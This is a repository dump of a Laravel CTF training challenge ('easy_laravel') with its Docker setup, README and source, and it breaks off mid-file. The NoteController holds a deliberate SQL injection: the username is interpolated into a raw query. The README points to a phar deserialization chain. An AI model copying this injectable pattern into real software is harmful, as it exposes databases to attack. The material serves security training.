├── easy_laravel ├── public │ ├── favicon.ico │ ├── robots.txt │ ├── .htaccess │ └── index.php ├── database │ ├── seeds │ │ ├── .gitkeep │ │ ├── UserTableSeeder.php │ │ ├── DatabaseSeeder.php │ │ └── NoteTableSeeder.php │ ├── .gitignore │ ├── migrations │ │ ├── .gitkeep │ │ ├── 2018_10_08_062358_create_notes_table.php │ │ ├── 2014_10_12_100000_create_password_resets_table.php │ │ └── 2014_10_12_000000_create_users_table.php │ └── factories │ │ └── ModelFactory.php ├── resources │ ├── views │ │ ├── vendor │ │ │ ├── .gitkeep │ │ │ └── flash │ │ │ │ ├── modal.blade.php │ │ │ │ └── message.blade.php │ │ ├── auth │ │ │ ├── flag.blade.php │ │ │ ├── passwords │ │ │ │ ├── email.blade.php │ │ │ │ └── reset.blade.php │ │ │ ├── login.blade.php │ │ │ └── register.blade.php │ │ ├── home.blade.php │ │ ├── note.blade.php │ │ ├── upload.blade.php │ │ ├── files.blade.php │ │ ├── errors │ │ │ ├── error.blade.php │ │ │ └── 503.blade.php │ │ ├── welcome.blade.php │ │ └── layouts │ │ │ └── app.blade.php │ ├── assets │ │ ├── sass │ │ │ ├── app.scss │ │ │ └── variables.scss │ │ └── js │ │ │ ├── app.js │ │ │ ├── components │ │ │ └── Example.vue │ │ │ └── bootstrap.js │ └── lang │ │ └── en │ │ ├── pagination.php │ │ ├── auth.php │ │ ├── passwords.php │ │ └── validation.php ├── storage │ ├── logs │ │ └── .gitignore │ ├── app │ │ ├── public │ │ │ └── .gitignore │ │ └── .gitignore │ └── framework │ │ ├── cache │ │ └── .gitignore │ │ ├── sessions │ │ └── .gitignore │ │ ├── views │ │ └── .gitignore │ │ └── .gitignore ├── bootstrap │ ├── cache │ │ └── .gitignore │ ├── autoload.php │ └── app.php ├── app │ ├── Note.php │ ├── Http │ │ ├── Middleware │ │ │ ├── EncryptCookies.php │ │ │ ├── VerifyCsrfToken.php │ │ │ ├── RedirectIfAuthenticated.php │ │ │ └── AdminMiddleware.php │ │ ├── Controllers │ │ │ ├── Controller.php │ │ │ ├── FlagController.php │ │ │ ├── NoteController.php │ │ │ ├── HomeController.php │ │ │ ├── Auth │ │ │ │ ├── ResetPasswordController.php │ │ │ │ ├── ForgotPasswordController.php │ │ │ │ ├── LoginController.php │ │ │ │ └── RegisterController.php │ │ │ └── UploadController.php │ │ ├── Requests │ │ │ └── UploadRequest.php │ │ └── Kernel.php │ ├── Providers │ │ ├── AppServiceProvider.php │ │ ├── BroadcastServiceProvider.php │ │ ├── AuthServiceProvider.php │ │ ├── EventServiceProvider.php │ │ └── RouteServiceProvider.php │ ├── User.php │ ├── Console │ │ └── Kernel.php │ └── Exceptions │ │ └── Handler.php ├── docker-php-entrypoint ├── reset_admin_passwd.sh ├── reset_admin_passwd.php ├── package.json ├── tests │ ├── ExampleTest.php │ └── TestCase.php ├── flag.php ├── routes │ ├── console.php │ ├── api.php │ └── web.php ├── .env.example ├── gulpfile.js ├── server.php ├── phpunit.xml ├── config │ ├── compile.php │ ├── services.php │ ├── view.php │ ├── broadcasting.php │ ├── filesystems.php │ ├── queue.php │ ├── cache.php │ ├── auth.php │ ├── database.php │ ├── mail.php │ ├── session.php │ ├── debugbar.php │ └── app.php ├── composer.json ├── artisan └── readme.md ├── .DS_Store ├── exp ├── easy_laravel_exp.gif ├── easy_laravel_exp.phar ├── easy_laravel_exp_gen.php └── easy_laravel_exp.py ├── .gitignore ├── docker-compose.yml ├── README.md └── Dockerfile /easy_laravel/public/favicon.ico: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /easy_laravel/database/seeds/.gitkeep: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /easy_laravel/database/.gitignore: -------------------------------------------------------------------------------- 1 | *.sqlite 2 | -------------------------------------------------------------------------------- /easy_laravel/database/migrations/.gitkeep: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/vendor/.gitkeep: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /easy_laravel/storage/logs/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore 3 | -------------------------------------------------------------------------------- /easy_laravel/bootstrap/cache/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore 3 | -------------------------------------------------------------------------------- /easy_laravel/public/robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Disallow: 3 | -------------------------------------------------------------------------------- /easy_laravel/storage/app/public/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore 3 | -------------------------------------------------------------------------------- /easy_laravel/storage/app/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !public/ 3 | !.gitignore 4 | -------------------------------------------------------------------------------- /easy_laravel/storage/framework/cache/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore 3 | -------------------------------------------------------------------------------- /easy_laravel/storage/framework/sessions/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore 3 | -------------------------------------------------------------------------------- /easy_laravel/storage/framework/views/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore 3 | -------------------------------------------------------------------------------- /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CTFTraining/huwangbei_2018_easy_laravel/HEAD/.DS_Store -------------------------------------------------------------------------------- /exp/easy_laravel_exp.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CTFTraining/huwangbei_2018_easy_laravel/HEAD/exp/easy_laravel_exp.gif -------------------------------------------------------------------------------- /exp/easy_laravel_exp.phar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CTFTraining/huwangbei_2018_easy_laravel/HEAD/exp/easy_laravel_exp.phar -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | /node_modules 2 | /public/storage 3 | /vendor 4 | /.idea 5 | Homestead.json 6 | Homestead.yaml 7 | .env 8 | .DS_Store.DS_Store 9 | -------------------------------------------------------------------------------- /easy_laravel/app/Note.php: -------------------------------------------------------------------------------- 1 | /th1s1s_F14g_2333333 5 | export FLAG=not_flag 6 | FLAG=not_flag 7 | 8 | # reset_admin_passwd 9 | sh -c '/usr/local/bin/reset_admin_passwd.sh' & 10 | 11 | exec apache2-foreground 12 | -------------------------------------------------------------------------------- /easy_laravel/resources/assets/sass/app.scss: -------------------------------------------------------------------------------- 1 | 2 | // Fonts 3 | @import url(https://fonts.googleapis.com/css?family=Raleway:300,400,600); 4 | 5 | // Variables 6 | @import "variables"; 7 | 8 | // Bootstrap 9 | @import "node_modules/bootstrap-sass/assets/stylesheets/bootstrap"; 10 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | # 护网杯 2018 WEB (4) easy_laravel 2 | # Author : Virink 3 | version: "2" 4 | 5 | services: 6 | 7 | web: 8 | image: ctftraining/huwangbei_2018_easy_laravel 9 | # build: . 10 | ports: 11 | - "127.0.0.1:8081:80" 12 | environment: 13 | - FLAG=flag{test_flag} 14 | restart: always 15 | -------------------------------------------------------------------------------- /easy_laravel/database/seeds/UserTableSeeder.php: -------------------------------------------------------------------------------- 1 | create(); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /easy_laravel/reset_admin_passwd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | while true; do 3 | # reset passwd 4 | php /usr/local/bin/reset_admin_passwd 5 | # reset template 6 | cp /var/www/html/storage/flag.php /var/www/html/storage/framework/views/73eb5933be1eb2293500f4a74b45284fd453f0bb.php 7 | touch -t 209911111111.11 /var/www/html/storage/framework/views/73eb5933be1eb2293500f4a74b45284fd453f0bb.php 8 | sleep 3m 9 | done -------------------------------------------------------------------------------- /easy_laravel/database/seeds/DatabaseSeeder.php: -------------------------------------------------------------------------------- 1 | call(UserTableSeeder::class); 15 | $this->call(NoteTableSeeder::class); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /easy_laravel/reset_admin_passwd.php: -------------------------------------------------------------------------------- 1 | open('/var/www/html/database/database.sqlite'); 6 | if (!$this->lastErrorCode()) { 7 | // 随便加密 8 | $passwd = md5(microtime(true)); 9 | $this->query("UPDATE `users` SET password='$passwd'"); 10 | } 11 | // var_dump($this->lastErrorMsg()); 12 | } 13 | } 14 | new MyDB(); -------------------------------------------------------------------------------- /easy_laravel/app/Http/Middleware/EncryptCookies.php: -------------------------------------------------------------------------------- 1 | delete(); 13 | \DB::table('notes')->insert(array( 14 | 0 => array( 15 | 'author' => '4uuu Nya', 16 | 'content' => 'apache是坠吼的 ( 好麻烦,默认配置也是坠吼的', 17 | ), 18 | )); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Controllers/FlagController.php: -------------------------------------------------------------------------------- 1 | middleware(['auth', 'admin']); 12 | } 13 | 14 | public function showFlag() 15 | { 16 | $flag = file_get_contents('/th1s1s_F14g_2333333'); 17 | return view('auth.flag')->with('flag', $flag); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /easy_laravel/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "private": true, 3 | "scripts": { 4 | "prod": "gulp --production", 5 | "dev": "gulp watch" 6 | }, 7 | "devDependencies": { 8 | "bootstrap-sass": "^3.3.7", 9 | "gulp": "^3.9.1", 10 | "jquery": "^3.1.0", 11 | "laravel-elixir": "^6.0.0-9", 12 | "laravel-elixir-vue": "^0.1.4", 13 | "laravel-elixir-webpack-official": "^1.0.2", 14 | "lodash": "^4.14.0", 15 | "vue": "^1.0.26", 16 | "vue-resource": "^0.9.3" 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/auth/flag.blade.php: -------------------------------------------------------------------------------- 1 | @extends('layouts.app') 2 | 3 | @section('content') 4 |
5 |
6 |
7 |
8 |
Dashboard
9 |
10 | {{ $flag }} 11 |
12 |
13 |
14 |
15 |
16 | @endsection 17 | -------------------------------------------------------------------------------- /easy_laravel/tests/ExampleTest.php: -------------------------------------------------------------------------------- 1 | visit('/') 17 | ->see('Laravel'); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/home.blade.php: -------------------------------------------------------------------------------- 1 | @extends('layouts.app') 2 | 3 | @section('content') 4 |
5 |
6 |
7 |
8 |
Dashboard
9 |
10 | You are logged in! 11 |
12 |
13 |
14 |
15 |
16 | @endsection 17 | -------------------------------------------------------------------------------- /easy_laravel/app/Providers/AppServiceProvider.php: -------------------------------------------------------------------------------- 1 | middleware('auth'); 15 | } 16 | 17 | public function index(Note $note) 18 | { 19 | $username = Auth::user()->name; 20 | $notes = DB::select("SELECT * FROM `notes` WHERE `author`='{$username}'"); 21 | return view('note', compact('notes')); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /easy_laravel/flag.php: -------------------------------------------------------------------------------- 1 | startSection('content'); ?> 2 |
3 |
4 |
5 |
6 |
Dashboard
7 |
8 | no flag 9 |
10 |
11 |
12 |
13 |
14 | stopSection(); ?> 15 | 16 | make('layouts.app', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?> -------------------------------------------------------------------------------- /easy_laravel/routes/console.php: -------------------------------------------------------------------------------- 1 | comment(Inspiring::quote()); 18 | }); 19 | -------------------------------------------------------------------------------- /easy_laravel/routes/api.php: -------------------------------------------------------------------------------- 1 | user(); 18 | })->middleware('auth:api'); 19 | -------------------------------------------------------------------------------- /easy_laravel/.env.example: -------------------------------------------------------------------------------- 1 | APP_ENV=local 2 | APP_KEY= 3 | APP_DEBUG=false 4 | APP_LOG_LEVEL=info 5 | APP_URL=http://localhost 6 | 7 | DB_CONNECTION=sqlite 8 | DB_HOST=127.0.0.1 9 | DB_PORT=3306 10 | DB_DATABASE=homestead 11 | DB_USERNAME=homestead 12 | DB_PASSWORD=secret 13 | 14 | BROADCAST_DRIVER=log 15 | CACHE_DRIVER=file 16 | SESSION_DRIVER=file 17 | QUEUE_DRIVER=sync 18 | 19 | REDIS_HOST=127.0.0.1 20 | REDIS_PASSWORD=null 21 | REDIS_PORT=6379 22 | 23 | MAIL_DRIVER=smtp 24 | MAIL_HOST=mailtrap.io 25 | MAIL_PORT=2525 26 | MAIL_USERNAME=null 27 | MAIL_PASSWORD=null 28 | MAIL_ENCRYPTION=null 29 | 30 | PUSHER_KEY= 31 | PUSHER_SECRET= 32 | PUSHER_APP_ID= 33 | -------------------------------------------------------------------------------- /easy_laravel/gulpfile.js: -------------------------------------------------------------------------------- 1 | const elixir = require('laravel-elixir'); 2 | 3 | require('laravel-elixir-vue'); 4 | 5 | /* 6 | |-------------------------------------------------------------------------- 7 | | Elixir Asset Management 8 | |-------------------------------------------------------------------------- 9 | | 10 | | Elixir provides a clean, fluent API for defining some basic Gulp tasks 11 | | for your Laravel application. By default, we are compiling the Sass 12 | | file for our application, as well as publishing vendor resources. 13 | | 14 | */ 15 | 16 | elixir(mix => { 17 | mix.sass('app.scss') 18 | .webpack('app.js'); 19 | }); 20 | -------------------------------------------------------------------------------- /easy_laravel/app/User.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | Options -MultiViews 4 | 5 | 6 | RewriteEngine On 7 | 8 | # Redirect Trailing Slashes If Not A Folder... 9 | RewriteCond %{REQUEST_FILENAME} !-d 10 | RewriteRule ^(.*)/$ /$1 [L,R=301] 11 | 12 | # Handle Front Controller... 13 | RewriteCond %{REQUEST_FILENAME} !-d 14 | RewriteCond %{REQUEST_FILENAME} !-f 15 | RewriteRule ^ index.php [L] 16 | 17 | # Handle Authorization Header 18 | RewriteCond %{HTTP:Authorization} . 19 | RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] 20 | 21 | -------------------------------------------------------------------------------- /easy_laravel/resources/lang/en/pagination.php: -------------------------------------------------------------------------------- 1 | '« Previous', 17 | 'next' => 'Next »', 18 | 19 | ]; 20 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/note.blade.php: -------------------------------------------------------------------------------- 1 | @extends('layouts.app') 2 | 3 | @section('content') 4 |
5 |
6 |
7 | @include('flash::message') 8 |
    9 | @foreach ($notes as $note) 10 |
  • 11 |
    {{ $note->content }}
    12 |
    • 13 | @endforeach 14 |
15 |
16 |
17 |
18 | @endsection 19 | -------------------------------------------------------------------------------- /easy_laravel/server.php: -------------------------------------------------------------------------------- 1 | 8 | */ 9 | 10 | $uri = urldecode( 11 | parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH) 12 | ); 13 | 14 | // This file allows us to emulate Apache's "mod_rewrite" functionality from the 15 | // built-in PHP web server. This provides a convenient way to test a Laravel 16 | // application without having installed a "real" web server software here. 17 | if ($uri !== '/' && file_exists(__DIR__.'/public'.$uri)) { 18 | return false; 19 | } 20 | 21 | require_once __DIR__.'/public/index.php'; 22 | -------------------------------------------------------------------------------- /easy_laravel/tests/TestCase.php: -------------------------------------------------------------------------------- 1 | make(Illuminate\Contracts\Console\Kernel::class)->bootstrap(); 22 | 23 | return $app; 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Requests/UploadRequest.php: -------------------------------------------------------------------------------- 1 | 'image' 28 | ]; 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Middleware/RedirectIfAuthenticated.php: -------------------------------------------------------------------------------- 1 | check()) { 21 | return redirect('/home'); 22 | } 23 | 24 | return $next($request); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /easy_laravel/resources/assets/js/app.js: -------------------------------------------------------------------------------- 1 | 2 | /** 3 | * First we will load all of this project's JavaScript dependencies which 4 | * include Vue and Vue Resource. This gives a great starting point for 5 | * building robust, powerful web applications using Vue and Laravel. 6 | */ 7 | 8 | require('./bootstrap'); 9 | 10 | /** 11 | * Next, we will create a fresh Vue application instance and attach it to 12 | * the body of the page. From here, you may begin adding components to 13 | * the application, or feel free to tweak this setup for your needs. 14 | */ 15 | 16 | Vue.component('example', require('./components/Example.vue')); 17 | 18 | const app = new Vue({ 19 | el: 'body' 20 | }); 21 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 护网杯 2018 easy_laravel 2 | 3 | ## 题目详情 4 | 5 | - http://www.huwangbei.cn/ 6 | - 护网杯 2018 WEB (4) easy_laravel 7 | - **PHP 代码审计** 8 | 9 | ### 提示 10 | 11 | + blade 12 | + pop chain 13 | 14 | ## 考点 15 | 16 | - 代码审计 17 | - 简单注入 18 | - Laravel 框架 Auth、Blade模板 19 | - 反序列化 [利用phar 拓展 php 反序列化漏洞攻击面](https://paper.seebug.org/680/) 20 | 21 | ## 启动 22 | 23 | docker-compose up -d 24 | open http://127.0.0.1:8081/ 25 | 26 | ## 复现说明及修改 27 | 28 | 该环境根据 github 开源代码 `https://github.com/qqqqqqvq/easy_laravel` 及打比赛过程推理进行复现。 29 | 30 | - 采用 sqlite 作为数据库,减小体积(不影响做题) 31 | - 增加自动重置管理员密码脚本(虽然没什么卵用) 32 | - 增加自动重置恢复缓存文件脚本 33 | 34 | ## 版权 35 | 36 | 该题目复现环境尚未取得主办方及出题人相关授权,如果侵权,请联系本人删除( virink@outlook.com ) -------------------------------------------------------------------------------- /easy_laravel/app/Providers/BroadcastServiceProvider.php: -------------------------------------------------------------------------------- 1 | id === (int) $userId; 24 | }); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /easy_laravel/resources/assets/js/components/Example.vue: -------------------------------------------------------------------------------- 1 | 16 | 17 | 24 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Controllers/HomeController.php: -------------------------------------------------------------------------------- 1 | middleware('auth'); 17 | } 18 | 19 | /** 20 | * Show the application dashboard. 21 | * 22 | * @return \Illuminate\Http\Response 23 | */ 24 | public function index() 25 | { 26 | return view('home'); 27 | } 28 | 29 | public function error() 30 | { 31 | return view('errors.error'); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /easy_laravel/resources/lang/en/auth.php: -------------------------------------------------------------------------------- 1 | 'These credentials do not match our records.', 17 | 'throttle' => 'Too many login attempts. Please try again in :seconds seconds.', 18 | 19 | ]; 20 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Middleware/AdminMiddleware.php: -------------------------------------------------------------------------------- 1 | auth = $auth; 15 | } 16 | 17 | /* 18 | * Handle an incoming request. 19 | * 20 | * @param \Illuminate\Http\Request $request 21 | * @param \Closure $next 22 | * @return mixed 23 | */ 24 | public function handle($request, Closure $next) 25 | { 26 | if ($this->auth->user()->email !== 'admin@qvq.im') { 27 | return redirect(route('error')); 28 | } 29 | return $next($request); 30 | } 31 | } -------------------------------------------------------------------------------- /easy_laravel/app/Providers/AuthServiceProvider.php: -------------------------------------------------------------------------------- 1 | 'App\Policies\ModelPolicy', 17 | ]; 18 | 19 | /** 20 | * Register any authentication / authorization services. 21 | * 22 | * @return void 23 | */ 24 | public function boot() 25 | { 26 | $this->registerPolicies(); 27 | 28 | // 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/vendor/flash/modal.blade.php: -------------------------------------------------------------------------------- 1 | 20 | -------------------------------------------------------------------------------- /easy_laravel/app/Providers/EventServiceProvider.php: -------------------------------------------------------------------------------- 1 | [ 17 | 'App\Listeners\EventListener', 18 | ], 19 | ]; 20 | 21 | /** 22 | * Register any events for your application. 23 | * 24 | * @return void 25 | */ 26 | public function boot() 27 | { 28 | parent::boot(); 29 | 30 | // 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /easy_laravel/database/migrations/2018_10_08_062358_create_notes_table.php: -------------------------------------------------------------------------------- 1 | increments('id'); 18 | $table->string('content'); 19 | $table->string('author'); 20 | $table->timestamps(); 21 | }); 22 | } 23 | 24 | /** 25 | * Reverse the migrations. 26 | * 27 | * @return void 28 | */ 29 | public function down() 30 | { 31 | Schema::drop('notes'); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /easy_laravel/database/migrations/2014_10_12_100000_create_password_resets_table.php: -------------------------------------------------------------------------------- 1 | string('email')->index(); 18 | $table->string('token')->index(); 19 | $table->timestamp('created_at')->nullable(); 20 | }); 21 | } 22 | 23 | /** 24 | * Reverse the migrations. 25 | * 26 | * @return void 27 | */ 28 | public function down() 29 | { 30 | Schema::drop('password_resets'); 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /easy_laravel/database/factories/ModelFactory.php: -------------------------------------------------------------------------------- 1 | define(App\User::class, function (Faker\Generator $faker) { 15 | static $password; 16 | 17 | return [ 18 | 'name' => '4uuu Nya', 19 | 'email' => 'admin@qvq.im', 20 | 'password' => bcrypt(str_random(40)), 21 | 'remember_token' => str_random(10), 22 | ]; 23 | }); 24 | 25 | $factory->define(App\Note::class, function (Faker\Generator $faker) { 26 | 27 | }); 28 | -------------------------------------------------------------------------------- /easy_laravel/resources/lang/en/passwords.php: -------------------------------------------------------------------------------- 1 | 'Passwords must be at least six characters and match the confirmation.', 17 | 'reset' => 'Your password has been reset!', 18 | 'sent' => 'We have e-mailed your password reset link!', 19 | 'token' => 'This password reset token is invalid.', 20 | 'user' => "We can't find a user with that e-mail address.", 21 | 22 | ]; 23 | -------------------------------------------------------------------------------- /easy_laravel/database/migrations/2014_10_12_000000_create_users_table.php: -------------------------------------------------------------------------------- 1 | increments('id'); 18 | $table->string('name'); 19 | $table->string('email')->unique(); 20 | $table->string('password'); 21 | $table->rememberToken(); 22 | $table->timestamps(); 23 | }); 24 | } 25 | 26 | /** 27 | * Reverse the migrations. 28 | * 29 | * @return void 30 | */ 31 | public function down() 32 | { 33 | Schema::drop('users'); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Controllers/Auth/ResetPasswordController.php: -------------------------------------------------------------------------------- 1 | middleware('guest'); 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /easy_laravel/resources/assets/sass/variables.scss: -------------------------------------------------------------------------------- 1 | 2 | // Body 3 | $body-bg: #f5f8fa; 4 | 5 | // Borders 6 | $laravel-border-color: darken($body-bg, 10%); 7 | $list-group-border: $laravel-border-color; 8 | $navbar-default-border: $laravel-border-color; 9 | $panel-default-border: $laravel-border-color; 10 | $panel-inner-border: $laravel-border-color; 11 | 12 | // Brands 13 | $brand-primary: #3097D1; 14 | $brand-info: #8eb4cb; 15 | $brand-success: #2ab27b; 16 | $brand-warning: #cbb956; 17 | $brand-danger: #bf5329; 18 | 19 | // Typography 20 | $font-family-sans-serif: "Raleway", sans-serif; 21 | $font-size-base: 14px; 22 | $line-height-base: 1.6; 23 | $text-color: #636b6f; 24 | 25 | // Navbar 26 | $navbar-default-bg: #fff; 27 | 28 | // Buttons 29 | $btn-default-color: $text-color; 30 | 31 | // Inputs 32 | $input-border: lighten($text-color, 40%); 33 | $input-border-focus: lighten($brand-primary, 25%); 34 | $input-color-placeholder: lighten($text-color, 30%); 35 | 36 | // Panels 37 | $panel-default-heading-bg: #fff; 38 | -------------------------------------------------------------------------------- /easy_laravel/app/Console/Kernel.php: -------------------------------------------------------------------------------- 1 | command('inspire') 28 | // ->hourly(); 29 | } 30 | 31 | /** 32 | * Register the Closure based commands for the application. 33 | * 34 | * @return void 35 | */ 36 | protected function commands() 37 | { 38 | require base_path('routes/console.php'); 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Controllers/Auth/ForgotPasswordController.php: -------------------------------------------------------------------------------- 1 | middleware('guest'); 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /easy_laravel/routes/web.php: -------------------------------------------------------------------------------- 1 | name('note'); 18 | Route::get('/upload', 'UploadController@index')->name('upload'); 19 | Route::post('/upload', 'UploadController@upload')->name('upload'); 20 | Route::get('/flag', 'FlagController@showFlag')->name('flag'); 21 | Route::get('/files', 'UploadController@files')->name('files'); 22 | Route::post('/check', 'UploadController@check')->name('check'); 23 | Route::get('/error', 'HomeController@error')->name('error'); -------------------------------------------------------------------------------- /easy_laravel/phpunit.xml: -------------------------------------------------------------------------------- 1 | 2 | 11 | 12 | 13 | ./tests 14 | 15 | 16 | 17 | 18 | ./app 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/vendor/flash/message.blade.php: -------------------------------------------------------------------------------- 1 | @if (session()->has('flash_notification.message')) 2 | @if (session()->has('flash_notification.overlay')) 3 | @include('flash::modal', [ 4 | 'modalClass' => 'flash-modal', 5 | 'title' => session('flash_notification.title'), 6 | 'body' => session('flash_notification.message') 7 | ]) 8 | @else 9 |
13 | @if(session()->has('flash_notification.important')) 14 | 19 | @endif 20 | 21 | {!! session('flash_notification.message') !!} 22 |
23 | @endif 24 | @endif 25 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/upload.blade.php: -------------------------------------------------------------------------------- 1 | @extends('layouts.app') 2 | 3 | @section('content') 4 |
5 |
6 |
7 | @include('flash::message') 8 |
9 |
upload
10 |
11 |
12 | {{ csrf_field() }} 13 |
14 | 15 |
16 |
17 | 18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 | @endsection 26 | -------------------------------------------------------------------------------- /easy_laravel/config/compile.php: -------------------------------------------------------------------------------- 1 | [ 17 | // 18 | ], 19 | 20 | /* 21 | |-------------------------------------------------------------------------- 22 | | Compiled File Providers 23 | |-------------------------------------------------------------------------- 24 | | 25 | | Here you may list service providers which define a "compiles" function 26 | | that returns additional files that should be compiled, providing an 27 | | easy way to get common files from any packages you are utilizing. 28 | | 29 | */ 30 | 31 | 'providers' => [ 32 | // 33 | ], 34 | 35 | ]; 36 | -------------------------------------------------------------------------------- /easy_laravel/config/services.php: -------------------------------------------------------------------------------- 1 | [ 18 | 'domain' => env('MAILGUN_DOMAIN'), 19 | 'secret' => env('MAILGUN_SECRET'), 20 | ], 21 | 22 | 'ses' => [ 23 | 'key' => env('SES_KEY'), 24 | 'secret' => env('SES_SECRET'), 25 | 'region' => 'us-east-1', 26 | ], 27 | 28 | 'sparkpost' => [ 29 | 'secret' => env('SPARKPOST_SECRET'), 30 | ], 31 | 32 | 'stripe' => [ 33 | 'model' => App\User::class, 34 | 'key' => env('STRIPE_KEY'), 35 | 'secret' => env('STRIPE_SECRET'), 36 | ], 37 | 38 | ]; 39 | -------------------------------------------------------------------------------- /easy_laravel/app/Http/Controllers/Auth/LoginController.php: -------------------------------------------------------------------------------- 1 | middleware('guest', ['except' => 'logout']); 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /easy_laravel/config/view.php: -------------------------------------------------------------------------------- 1 | [ 17 | realpath(base_path('resources/views')), 18 | ], 19 | 20 | /* 21 | |-------------------------------------------------------------------------- 22 | | Compiled View Path 23 | |-------------------------------------------------------------------------- 24 | | 25 | | This option determines where all the compiled Blade templates will be 26 | | stored for your application. Typically, this is within the storage 27 | | directory. However, as usual, you are free to change this value. 28 | | 29 | */ 30 | 31 | 'compiled' => realpath(storage_path('framework/views')), 32 | 33 | ]; 34 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/files.blade.php: -------------------------------------------------------------------------------- 1 | @extends('layouts.app') 2 | 3 | @section('content') 4 |
5 |
6 |
7 | @include('flash::message') 8 |
    9 | @foreach ($files as $file) 10 |
  • 11 |
    {{ $file }}
    12 |
    13 |
    14 | 15 | 16 | {{ csrf_field() }} 17 |
    18 |
    19 |
    • 20 | @endforeach 21 |
22 |
23 |
24 |
25 | @endsection 26 | -------------------------------------------------------------------------------- /easy_laravel/bootstrap/autoload.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Be right back. 5 | 6 | 7 | 8 | 40 | 41 | 42 |
43 |
44 |
Error
45 |
{{ $error_msg }}
46 |
47 |
48 | 49 | 50 | -------------------------------------------------------------------------------- /easy_laravel/resources/views/errors/503.blade.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Be right back. 5 | 6 | 7 | 8 | 39 | 40 | 41 |
42 |
43 |
Be right back.
44 |
45 |
46 | 47 | 48 | -------------------------------------------------------------------------------- /easy_laravel/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "laravel/laravel", 3 | "description": "The Laravel Framework.", 4 | "keywords": ["framework", "laravel"], 5 | "license": "MIT", 6 | "type": "project", 7 | "require": { 8 | "php": ">=5.6.4", 9 | "laravel/framework": "5.3.*", 10 | "laracasts/flash": "^2.0" 11 | }, 12 | "require-dev": { 13 | "fzaninotto/faker": "~1.4", 14 | "mockery/mockery": "0.9.*", 15 | "phpunit/phpunit": "~5.0", 16 | "symfony/css-selector": "3.1.*", 17 | "symfony/dom-crawler": "3.1.*" 18 | }, 19 | "autoload": { 20 | "classmap": [ 21 | "database" 22 | ], 23 | "psr-4": { 24 | "App\\": "app/" 25 | } 26 | }, 27 | "autoload-dev": { 28 | "classmap": [ 29 | "tests/TestCase.php" 30 | ] 31 | }, 32 | "scripts": { 33 | "post-root-package-install": [ 34 | "php -r \"file_exists('.env') || copy('.env.example', '.env');\"" 35 | ], 36 | "post-create-project-cmd": [ 37 | "php artisan key:generate" 38 | ], 39 | "post-install-cmd": [ 40 | "Illuminate\\Foundation\\ComposerScripts::postInstall", 41 | "php artisan optimize" 42 | ], 43 | "post-update-cmd": [ 44 | "Illuminate\\Foundation\\ComposerScripts::postUpdate", 45 | "php artisan optimize" 46 | ] 47 | }, 48 | "config": { 49 | "preferred-install": "dist" 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /easy_laravel/resources/assets/js/bootstrap.js: -------------------------------------------------------------------------------- 1 | 2 | window._ = require('lodash'); 3 | 4 | /** 5 | * We'll load jQuery and the Bootstrap jQuery plugin which provides support 6 | * for JavaScript based Bootstrap features such as modals and tabs. This 7 | * code may be modified to fit the specific needs of your application. 8 | */ 9 | 10 | window.$ = window.jQuery = require('jquery'); 11 | require('bootstrap-sass'); 12 | 13 | /** 14 